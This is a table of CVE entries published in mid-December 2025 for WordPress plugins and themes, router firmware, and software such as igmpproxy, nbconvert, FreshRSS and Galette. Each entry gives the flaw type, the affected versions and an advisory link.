| A WP Life--Login Page Customizer – Customizer Login Page, Admin Page, Custom Design | Missing Authorization vulnerability in A WP Life Login Page Customizer – Customizer Login Page, Admin Page, Custom Design customizer-login-page allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Login Page Customizer – Customizer Login Page, Admin Page, Custom Design: from n/a through <= 2.1.1. | 2025-12-18 | not yet calculated | CVE-2025-49902 | https://vdp.patchstack.com/database/Wordpress/Plugin/customizer-login-page/vulnerability/wordpress-login-page-customizer-customizer-login-page-admin-page-custom-design-plugin-2-1-1-broken-access-control-vulnerability?_s_id=cve |
| jetmonsters--Restaurant Menu by MotoPress | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in jetmonsters Restaurant Menu by MotoPress mp-restaurant-menu allows Retrieve Embedded Sensitive Data.This issue affects Restaurant Menu by MotoPress: from n/a through <= 2.4.7. | 2025-12-18 | not yet calculated | CVE-2025-49914 | https://vdp.patchstack.com/database/Wordpress/Plugin/mp-restaurant-menu/vulnerability/wordpress-restaurant-menu-by-motopress-plugin-2-4-7-sensitive-data-exposure-vulnerability?_s_id=cve |
| e4jvikwp--VikBooking Hotel Booking Engine & PMS | Insertion of Sensitive Information Into Sent Data vulnerability in e4jvikwp VikBooking Hotel Booking Engine & PMS vikbooking allows Retrieve Embedded Sensitive Data.This issue affects VikBooking Hotel Booking Engine & PMS: from n/a through <= 1.8.2. | 2025-12-18 | not yet calculated | CVE-2025-49918 | https://vdp.patchstack.com/database/Wordpress/Plugin/vikbooking/vulnerability/wordpress-vikbooking-hotel-booking-engine-pms-plugin-1-8-2-sensitive-data-exposure-vulnerability?_s_id=cve |
| WPCenter--eRoom | Insertion of Sensitive Information Into Sent Data vulnerability in WPCenter eRoom eroom-zoom-meetings-webinar allows Retrieve Embedded Sensitive Data.This issue affects eRoom: from n/a through <= 1.5.6. | 2025-12-18 | not yet calculated | CVE-2025-49919 | https://vdp.patchstack.com/database/Wordpress/Plugin/eroom-zoom-meetings-webinar/vulnerability/wordpress-eroom-plugin-1-5-6-sensitive-data-exposure-vulnerability?_s_id=cve |
| AncoraThemes--GlamChic | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes GlamChic glamchic allows PHP Local File Inclusion.This issue affects GlamChic: from n/a through <= 1.0.11. | 2025-12-18 | not yet calculated | CVE-2025-49941 | https://vdp.patchstack.com/database/Wordpress/Theme/glamchic/vulnerability/wordpress-glamchic-theme-1-0-11-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Gardis | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Gardis gardis allows PHP Local File Inclusion.This issue affects Gardis: from n/a through <= 1.2.13. | 2025-12-18 | not yet calculated | CVE-2025-49942 | https://vdp.patchstack.com/database/Wordpress/Theme/gardis/vulnerability/wordpress-gardis-theme-1-2-13-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Femme | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Femme femme allows PHP Local File Inclusion.This issue affects Femme: from n/a through <= 1.3.11. | 2025-12-18 | not yet calculated | CVE-2025-49943 | https://vdp.patchstack.com/database/Wordpress/Theme/femme/vulnerability/wordpress-femme-theme-1-3-11-local-file-inclusion-vulnerability?_s_id=cve |
| Mercury--Mercury | Mercury D196G d196gv1-cn-up_2020-01-09_11.21.44 is vulnerable to Buffer Overflow in the function sub_404CAEDC via the parameter fac_password. | 2025-12-16 | not yet calculated | CVE-2025-50398 | https://github.com/sezangel/IOT-vul/tree/main/Mercury/D196G/2 |
| Mercury--Mercury | Mercury D196G d196gv1-cn-up_2020-01-09_11.21.44 is vulnerable to Buffer Overflow in the function sub_404CAEDC via the parameter password. | 2025-12-16 | not yet calculated | CVE-2025-50401 | https://github.com/sezangel/IOT-vul/tree/main/Mercury/D196G/1 |
| igmpproxy--igmpproxy | igmpproxy 0.4 before commit 2b30c36 allows remote attackers to cause a denial of service (application crash) via a crafted IGMPv3 membership report packet with a malicious source address. Due to insufficient validation in the `recv_igmp()` function in src/igmpproxy.c, an invalid group record type can trigger a NULL pointer dereference when logging the address using `inet_fmtsrc()`. This vulnerability can be exploited by sending malformed multicast traffic to a host running igmpproxy, leading to a crash. igmpproxy is used in various embedded networking environments and consumer-grade IoT devices (such as home routers and media gateways) to handle multicast traffic for IPTV and other streaming services. Affected devices that rely on unpatched versions of igmpproxy may be vulnerable to remote denial-of-service attacks across a LAN . | 2025-12-19 | not yet calculated | CVE-2025-50681 | https://github.com/pali/igmpproxy/issues/97 https://github.com/younix/igmpproxy/commit/2b30c36e6ab5b21defb76ec6458ab7687984484c https://gist.github.com/miora-sora/dac1612d16c45c2aedb8605478adc28f |
| MicroStudio--MircoStudio | A HTML Injection vulnerability in the comment section of the project page in MicroStudio 24.01.29 allows remote attackers to inject arbitrary web script or HTML via the text parameter of add_project_comment function. | 2025-12-15 | not yet calculated | CVE-2025-51962 | https://github.com/pmgl/microstudio/ https://github.com/Sunnyshineshow/vulnerability-research/blob/main/CVE-2025-51962/CVE-2025-51962.md |
| Ctera--Ctera | Server-Side Request Forgery (SSRF) vulnerability in Ctera Portal 8.1.x (8.1.1417.24) allows remote attackers to induce the server to make arbitrary HTTP requests via a crafted HTML file containing an iframe. | 2025-12-16 | not yet calculated | CVE-2025-52196 | https://kb.ctera.com/docs/81x-portal https://gist.github.com/simonecris/99baeb07fe6e1803d461e44031819cd3 |
| AncoraThemes--Farm Agrico | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Farm Agrico farmagrico allows PHP Local File Inclusion.This issue affects Farm Agrico: from n/a through <= 1.3.11. | 2025-12-18 | not yet calculated | CVE-2025-52745 | https://vdp.patchstack.com/database/Wordpress/Theme/farmagrico/vulnerability/wordpress-farm-agrico-theme-1-3-11-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Faith & Hope | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Faith & Hope faith-hope allows PHP Local File Inclusion.This issue affects Faith & Hope: from n/a through <= 2.13.0. | 2025-12-18 | not yet calculated | CVE-2025-52768 | https://vdp.patchstack.com/database/Wordpress/Theme/faith-hope/vulnerability/wordpress-faith-hope-theme-2-13-0-local-file-inclusion-vulnerability?_s_id=cve |
| jupyter--nbconvert | The nbconvert tool, jupyter nbconvert, converts Jupyter notebooks to various other formats via Jinja templates. Versions of nbconvert up to and including 7.16.6 on Windows have a vulnerability in which converting a notebook containing SVG output to a PDF results in unauthorized code execution. Specifically, a third party can create a `inkscape.bat` file that defines a Windows batch script, capable of arbitrary code execution. When a user runs `jupyter nbconvert --to pdf` on a notebook containing SVG output to a PDF on a Windows platform from this directory, the `inkscape.bat` file is run unexpectedly. As of time of publication, no known patches exist. | 2025-12-17 | not yet calculated | CVE-2025-53000 | https://www.imperva.com/blog/code-execution-in-jupyter-notebook-exports |
| Dell--Dell | The Portrait Dell Color Management application 3.3.8 for Dell monitors has Insecure Permissions, | 2025-12-17 | not yet calculated | CVE-2025-53398 | https://www.portrait.com/dell/ https://www.portrait.com/dell-security-cve-updates/ |
| AncoraThemes--Exit Game | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Exit Game exit-game allows PHP Local File Inclusion.This issue affects Exit Game: from n/a through <= 1.4.3. | 2025-12-18 | not yet calculated | CVE-2025-53429 | https://vdp.patchstack.com/database/Wordpress/Theme/exit-game/vulnerability/wordpress-exit-game-theme-1-4-3-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Etta | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Etta etta allows PHP Local File Inclusion.This issue affects Etta: from n/a through <= 1.14.0. | 2025-12-18 | not yet calculated | CVE-2025-53430 | https://vdp.patchstack.com/database/Wordpress/Theme/etta/vulnerability/wordpress-etta-theme-1-14-0-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Emberlyn | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Emberlyn emberlyn allows PHP Local File Inclusion.This issue affects Emberlyn: from n/a through <= 1.3.1. | 2025-12-18 | not yet calculated | CVE-2025-53431 | https://vdp.patchstack.com/database/Wordpress/Theme/emberlyn/vulnerability/wordpress-emberlyn-theme-1-3-1-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Echo | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Echo echo allows PHP Local File Inclusion.This issue affects Echo: from n/a through <= 1.15.0. | 2025-12-18 | not yet calculated | CVE-2025-53432 | https://vdp.patchstack.com/database/Wordpress/Theme/echo/vulnerability/wordpress-echo-theme-1-15-0-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--EasyEat | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes EasyEat easyeat allows PHP Local File Inclusion.This issue affects EasyEat: from n/a through <= 1.9.0. | 2025-12-18 | not yet calculated | CVE-2025-53433 | https://vdp.patchstack.com/database/Wordpress/Theme/easyeat/vulnerability/wordpress-easyeat-theme-1-9-0-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--ChildHope | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes ChildHope childhope allows PHP Local File Inclusion.This issue affects ChildHope: from n/a through <= 1.1.8. | 2025-12-18 | not yet calculated | CVE-2025-53434 | https://vdp.patchstack.com/database/Wordpress/Theme/childhope/vulnerability/wordpress-childhope-theme-1-1-8-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Plan My Day | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Plan My Day planmyday allows PHP Local File Inclusion.This issue affects Plan My Day: from n/a through <= 1.1.13. | 2025-12-18 | not yet calculated | CVE-2025-53435 | https://vdp.patchstack.com/database/Wordpress/Theme/planmyday/vulnerability/wordpress-plan-my-day-theme-1-1-13-local-file-inclusion-vulnerability?_s_id=cve |
| BZOTheme--Monki | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in BZOTheme Monki monki allows PHP Local File Inclusion.This issue affects Monki: from n/a through <= 2.0.4. | 2025-12-18 | not yet calculated | CVE-2025-53436 | https://vdp.patchstack.com/database/Wordpress/Theme/monki/vulnerability/wordpress-monki-theme-2-0-4-local-file-inclusion-vulnerability?_s_id=cve |
| ApusTheme--Greenorganic | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ApusTheme Greenorganic greenorganic allows PHP Local File Inclusion.This issue affects Greenorganic: from n/a through <= 2.45. | 2025-12-18 | not yet calculated | CVE-2025-53437 | https://vdp.patchstack.com/database/Wordpress/Theme/greenorganic/vulnerability/wordpress-greenorganic-theme-2-45-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--FitLine | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes FitLine fitline allows PHP Local File Inclusion.This issue affects FitLine: from n/a through <= 1.6. | 2025-12-18 | not yet calculated | CVE-2025-53438 | https://vdp.patchstack.com/database/Wordpress/Theme/fitline/vulnerability/wordpress-fitline-theme-1-6-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Harper | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Harper harper allows PHP Local File Inclusion.This issue affects Harper: from n/a through <= 1.13. | 2025-12-18 | not yet calculated | CVE-2025-53439 | https://vdp.patchstack.com/database/Wordpress/Theme/harper/vulnerability/wordpress-harper-theme-1-13-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Greeny | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Greeny greeny allows PHP Local File Inclusion.This issue affects Greeny: from n/a through <= 2.6. | 2025-12-18 | not yet calculated | CVE-2025-53441 | https://vdp.patchstack.com/database/Wordpress/Theme/greeny/vulnerability/wordpress-greeny-theme-2-6-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Rentic | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Rentic rentic allows PHP Local File Inclusion.This issue affects Rentic: from n/a through <= 1.1. | 2025-12-18 | not yet calculated | CVE-2025-53442 | https://vdp.patchstack.com/database/Wordpress/Theme/rentic/vulnerability/wordpress-rentic-theme-1-1-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Smash | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Smash smash allows PHP Local File Inclusion.This issue affects Smash: from n/a through <= 1.7. | 2025-12-18 | not yet calculated | CVE-2025-53443 | https://vdp.patchstack.com/database/Wordpress/Theme/smash/vulnerability/wordpress-smash-theme-1-7-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Catwalk | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Catwalk catwalk allows PHP Local File Inclusion.This issue affects Catwalk: from n/a through <= 1.4. | 2025-12-18 | not yet calculated | CVE-2025-53445 | https://vdp.patchstack.com/database/Wordpress/Theme/catwalk/vulnerability/wordpress-catwalk-theme-1-4-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Beautique | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Beautique beautique allows PHP Local File Inclusion.This issue affects Beautique: from n/a through <= 1.5. | 2025-12-18 | not yet calculated | CVE-2025-53446 | https://vdp.patchstack.com/database/Wordpress/Theme/beautique/vulnerability/wordpress-beautique-theme-1-5-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Assembly | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Assembly assembly allows PHP Local File Inclusion.This issue affects Assembly: from n/a through <= 1.1. | 2025-12-18 | not yet calculated | CVE-2025-53447 | https://vdp.patchstack.com/database/Wordpress/Theme/assembly/vulnerability/wordpress-assembly-theme-1-1-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Rally | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Rally rally allows PHP Local File Inclusion.This issue affects Rally: from n/a through <= 1.1. | 2025-12-18 | not yet calculated | CVE-2025-53448 | https://vdp.patchstack.com/database/Wordpress/Theme/rally/vulnerability/wordpress-rally-theme-1-1-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Convex | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Convex convex allows PHP Local File Inclusion.This issue affects Convex: from n/a through <= 1.11. | 2025-12-18 | not yet calculated | CVE-2025-53449 | https://vdp.patchstack.com/database/Wordpress/Theme/convex/vulnerability/wordpress-convex-theme-1-11-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Hygia | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Hygia hygia allows PHP Local File Inclusion.This issue affects Hygia: from n/a through <= 1.16. | 2025-12-18 | not yet calculated | CVE-2025-53453 | https://vdp.patchstack.com/database/Wordpress/Theme/hygia/vulnerability/wordpress-hygia-theme-1-16-local-file-inclusion-vulnerability?_s_id=cve |
| Dell--Dell | An issue was discovered in the Portrait Dell Color Management application through 3.3.008 for Dell monitors, It creates a temporary folder, with weak permissions, during installation and uninstallation. A low-privileged attacker with local access could potentially exploit this, leading to elevation of privileges. | 2025-12-17 | not yet calculated | CVE-2025-53919 | https://portrait.com/dell https://www.portrait.com/dell-security-cve-updates/ |
| galette--galette | Galette is a membership management web application for non profit organizations. Starting in version 1.1.4 and prior to version 1.2.0, a user who is logged in as group manager may bypass intended restrictions on Contributions and Transactions. Version 1.2.0 fixes the issue. | 2025-12-19 | not yet calculated | CVE-2025-53922 | https://github.com/galette/galette/security/advisories/GHSA-5jp7-5c38-3pv6 |
| WC Lovers--WCFM Frontend Manager for WooCommerce | Missing Authorization vulnerability in WC Lovers WCFM - Frontend Manager for WooCommerce wc-frontend-manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WCFM - Frontend Manager for WooCommerce: from n/a through <= 6.7.21. | 2025-12-16 | not yet calculated | CVE-2025-54004 | https://vdp.patchstack.com/database/Wordpress/Plugin/wc-frontend-manager/vulnerability/wordpress-wcfm-frontend-manager-for-woocommerce-plugin-6-7-21-broken-access-control-vulnerability?_s_id=cve |
| sonalsinha21--SKT Page Builder | Missing Authorization vulnerability in sonalsinha21 SKT Page Builder skt-builder allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SKT Page Builder: from n/a through <= 4.9. | 2025-12-16 | not yet calculated | CVE-2025-54005 | https://vdp.patchstack.com/database/Wordpress/Plugin/skt-builder/vulnerability/wordpress-skt-page-builder-plugin-4-9-broken-access-control-vulnerability?_s_id=cve |
| CreativeMindsSolutions--CM On Demand Search And Replace | Missing Authorization vulnerability in CreativeMindsSolutions CM On Demand Search And Replace cm-on-demand-search-and-replace allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects CM On Demand Search And Replace: from n/a through <= 1.5.4. | 2025-12-16 | not yet calculated | CVE-2025-54045 | https://vdp.patchstack.com/database/Wordpress/Plugin/cm-on-demand-search-and-replace/vulnerability/wordpress-cm-on-demand-search-and-replace-plugin-1-5-4-broken-access-control-vulnerability?_s_id=cve |
| BoldThemes--DentiCare | Deserialization of Untrusted Data vulnerability in BoldThemes DentiCare denticare allows Object Injection.This issue affects DentiCare: from n/a through < 1.4.3. | 2025-12-18 | not yet calculated | CVE-2025-54723 | https://vdp.patchstack.com/database/Wordpress/Theme/denticare/vulnerability/wordpress-denticare-theme-1-4-3-php-object-injection-vulnerability?_s_id=cve |
| Tyler Moore--Super Blank | Missing Authorization vulnerability in Tyler Moore Super Blank super-blank allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Super Blank: from n/a through <= 1.2.0. | 2025-12-18 | not yet calculated | CVE-2025-54741 | https://vdp.patchstack.com/database/Wordpress/Plugin/super-blank/vulnerability/wordpress-super-blank-plugin-1-2-0-arbitrary-content-deletion-vulnerability?_s_id=cve |
| mkscripts--Download After Email | Missing Authorization vulnerability in mkscripts Download After Email download-after-email allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Download After Email: from n/a through 2.1.5-2.1.6. | 2025-12-18 | not yet calculated | CVE-2025-54743 | https://vdp.patchstack.com/database/Wordpress/Plugin/download-after-email/vulnerability/wordpress-download-after-email-plugin-2-1-5-2-1-6-other-vulnerability-type-vulnerability?_s_id=cve |
| miniOrange--miniOrange's Google Authenticator | Missing Authorization vulnerability in miniOrange miniOrange's Google Authenticator miniorange-2-factor-authentication allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects miniOrange's Google Authenticator: from n/a through <= 6.1.1. | 2025-12-18 | not yet calculated | CVE-2025-54745 | https://vdp.patchstack.com/database/Wordpress/Plugin/miniorange-2-factor-authentication/vulnerability/wordpress-miniorange-s-google-authenticator-plugin-6-1-1-broken-access-control-vulnerability?_s_id=cve |
| RomanCode--MapSVG | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in RomanCode MapSVG mapsvg allows Path Traversal.This issue affects MapSVG: from n/a through < 8.6.12. | 2025-12-18 | not yet calculated | CVE-2025-54748 | https://vdp.patchstack.com/database/Wordpress/Plugin/mapsvg/vulnerability/wordpress-mapsvg-plugin-8-6-12-arbitrary-file-download-vulnerability?_s_id=cve |
| WPXPO--PostX | Missing Authorization vulnerability in WPXPO PostX ultimate-post allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PostX: from n/a through <= 4.1.36. | 2025-12-18 | not yet calculated | CVE-2025-54751 | https://vdp.patchstack.com/database/Wordpress/Plugin/ultimate-post/vulnerability/wordpress-postx-plugin-4-1-36-broken-access-control-vulnerability?_s_id=cve |
| WPXPO--PostX | Incorrect Privilege Assignment vulnerability in WPXPO PostX ultimate-post allows Privilege Escalation.This issue affects PostX: from n/a through <= 4.1.35. | 2025-12-18 | not yet calculated | CVE-2025-55707 | https://vdp.patchstack.com/database/Wordpress/Plugin/ultimate-post/vulnerability/wordpress-postx-plugin-4-1-35-privilege-escalation-vulnerability?_s_id=cve |
| TOTOLINK--TOTOLINK | TOTOLINK N200RE V9.3.5u.6437_B20230519 is vulnerable to command Injection in setOpModeCfg via hostName. | 2025-12-15 | not yet calculated | CVE-2025-55893 | https://www.totolink.net/ https://github.com/l0tk3/CVES/blob/main/CVE-2025-55893.pdf |
| TOTOLINK--TOTOLINK | TOTOLINK A3300R V17.0.0cu.557_B20221024 and N200RE V9.3.5u.6448_B20240521 and V9.3.5u.6437_B20230519 are vulnerable to Incorrect Access Control. Attackers can send payloads to the interface without logging in (remote). | 2025-12-15 | not yet calculated | CVE-2025-55895 | https://www.totolink.net/ https://github.com/l0tk3/CVES/blob/main/CVE-2025-55895.pdf |
| TOTOLINK--TOTOLINK | TOTOLINK A3300R V17.0.0cu.596_B20250515 is vulnerable to command injection in the function NTPSyncWithHost via the host_time parameter. | 2025-12-15 | not yet calculated | CVE-2025-55901 | https://www.totolink.net https://github.com/l0tk3/CVES/blob/main/CVE-2025-55901.pdf |
| Dify--Dify | Default credentials in Dify thru 1.5.1. PostgreSQL username and password specified in the docker-compose.yaml file included in its source code. | 2025-12-18 | not yet calculated | CVE-2025-56157 | http://dify.com https://github.com/langgenius/dify https://gist.github.com/Cristliu/216ddbadaf3258498c93d408683ecabd |
| venusweb--Logtik | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in venusweb Logtik logtik allows Reflected XSS.This issue affects Logtik: from n/a through <= 2.3. | 2025-12-18 | not yet calculated | CVE-2025-57897 | https://vdp.patchstack.com/database/Wordpress/Theme/logtik/vulnerability/wordpress-logtik-theme-2-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| galette--galette | Galette is a membership management web application for non profit organizations. Starting in version 0.9.6 and prior to version 1.2.0, attackers with group manager role can bypass intended restrictions allowing unauthorized access and changes despite role-based controls. Since it requires privileged access initially, exploitation is restricted to malicious insiders or compromised group managers accounts. Version 1.2.0 fixes the issue. | 2025-12-19 | not yet calculated | CVE-2025-58052 | https://github.com/galette/galette/security/advisories/GHSA-gp9g-gf56-fcxx |
| galette--galette | Galette is a membership management web application for non profit organizations. Prior to version 1.2.0, while updating any existing account with a self forged POST request, one can gain higher privileges. Version 1.2.0 fixes the issue. | 2025-12-19 | not yet calculated | CVE-2025-58053 | https://github.com/galette/galette/security/advisories/GHSA-r7x8-6r56-498r |
| FreshRSS--FreshRSS | FreshRSS is a self-hosted RSS feed aggregator. In versions 1.23.0 through 1.27.0, using a path traversal inside the `language` user configuration parameter, it's possible to call `install.php` and perform various administrative actions as an unprivileged user. These actions include logging in as the admin, creating a new admin user, or set the database to an attacker-controlled MySQL server and abuse it to execute code in FreshRSS by setting malicious feed `curl_params` inside the `feed` table. Version 1.27.1 fixes the issue. | 2025-12-15 | not yet calculated | CVE-2025-58173 | https://github.com/FreshRSS/FreshRSS/security/advisories/GHSA-6c8h-w3j5-j293 https://github.com/FreshRSS/FreshRSS/pull/7878 https://github.com/FreshRSS/FreshRSS/pull/7971 https://github.com/FreshRSS/FreshRSS/pull/7979 https://github.com/FreshRSS/FreshRSS/commit/79604aa4b3051f083d1734bd9e82c6a89d785c5a#diff-49280171b6e7964e21a0270427e56eacb47b8ac562593a01ad4bc74b49f840c7R135 https://github.com/FreshRSS/FreshRSS/commit/dbbae15a8458679db0f4540dacdbdcff9c02ec8c#diff-63f610c36d0f2555c1787f6d0804f46f4df6e0f918dfe03408309039abf6efebL85-L88 https://github.com/FreshRSS/FreshRSS/commit/ee175dd6169a016fc898fac62d046e22c205dec0#diff-6ebff7743ede829cf5a7f0e4566b42023a2d4779cc8d7e96fefec116f2292174R190-R194 |
| axiomthemes--Paragon | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Paragon paragon allows PHP Local File Inclusion.This issue affects Paragon: from n/a through <= 1.1. | 2025-12-18 | not yet calculated | CVE-2025-58225 | https://vdp.patchstack.com/database/Wordpress/Theme/paragon/vulnerability/wordpress-paragon-theme-1-1-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Woo Hoo | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Woo Hoo woohoo allows PHP Local File Inclusion.This issue affects Woo Hoo: from n/a through <= 1.25. | 2025-12-18 | not yet calculated | CVE-2025-58706 | https://vdp.patchstack.com/database/Wordpress/Theme/woohoo/vulnerability/wordpress-woo-hoo-theme-1-25-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--777 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes 777 triple-seven allows PHP Local File Inclusion.This issue affects 777: from n/a through <= 1.3. | 2025-12-18 | not yet calculated | CVE-2025-58708 | https://vdp.patchstack.com/database/Wordpress/Theme/triple-seven/vulnerability/wordpress-777-theme-1-3-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Legacy | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Legacy legacy allows PHP Local File Inclusion.This issue affects Legacy: from n/a through <= 1.9. | 2025-12-18 | not yet calculated | CVE-2025-58709 | https://vdp.patchstack.com/database/Wordpress/Theme/legacy/vulnerability/wordpress-legacy-theme-1-9-local-file-inclusion-vulnerability?_s_id=cve |
| e-plugins--Hotel Listing | Incorrect Privilege Assignment vulnerability in e-plugins Hotel Listing hotel-listing allows Privilege Escalation.This issue affects Hotel Listing: from n/a through <= 1.4.0. | 2025-12-18 | not yet calculated | CVE-2025-58710 | https://vdp.patchstack.com/database/Wordpress/Plugin/hotel-listing/vulnerability/wordpress-hotel-listing-plugin-1-4-0-privilege-escalation-vulnerability?_s_id=cve |
| axiomthemes--Algenix | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Algenix algenix allows PHP Local File Inclusion.This issue affects Algenix: from n/a through <= 1.0. | 2025-12-18 | not yet calculated | CVE-2025-58803 | https://vdp.patchstack.com/database/Wordpress/Theme/algenix/vulnerability/wordpress-algenix-theme-1-0-local-file-inclusion-vulnerability?_s_id=cve |
| javothemes--Javo Core | Missing Authorization vulnerability in javothemes Javo Core javo-core allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Javo Core: from n/a through <= 3.0.0.529. | 2025-12-18 | not yet calculated | CVE-2025-58877 | https://vdp.patchstack.com/database/Wordpress/Plugin/javo-core/vulnerability/wordpress-javo-core-plugin-3-0-0-529-arbitrary-content-deletion-vulnerability?_s_id=cve |
| AncoraThemes--Festy | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Festy festy allows PHP Local File Inclusion.This issue affects Festy: from n/a through <= 1.13.0. | 2025-12-18 | not yet calculated | CVE-2025-58879 | https://vdp.patchstack.com/database/Wordpress/Theme/festy/vulnerability/wordpress-festy-theme-1-13-0-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Pathfinder | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Pathfinder pathfinder allows PHP Local File Inclusion.This issue affects Pathfinder: from n/a through <= 1.16. | 2025-12-18 | not yet calculated | CVE-2025-58885 | https://vdp.patchstack.com/database/Wordpress/Theme/pathfinder/vulnerability/wordpress-pathfinder-theme-1-16-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--The Flash | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes The Flash theflash allows PHP Local File Inclusion.This issue affects The Flash: from n/a through <= 1.15. | 2025-12-18 | not yet calculated | CVE-2025-58888 | https://vdp.patchstack.com/database/Wordpress/Theme/theflash/vulnerability/wordpress-the-flash-theme-1-15-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Towny | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Towny towny allows PHP Local File Inclusion.This issue affects Towny: from n/a through <= 1.16. | 2025-12-18 | not yet calculated | CVE-2025-58889 | https://vdp.patchstack.com/database/Wordpress/Theme/towny/vulnerability/wordpress-towny-theme-1-16-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Playful | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Playful playful allows PHP Local File Inclusion.This issue affects Playful: from n/a through <= 1.19.0. | 2025-12-18 | not yet calculated | CVE-2025-58890 | https://vdp.patchstack.com/database/Wordpress/Theme/playful/vulnerability/wordpress-playful-theme-1-19-0-local-file-inclusion-vulnerability?_s_id=cve |
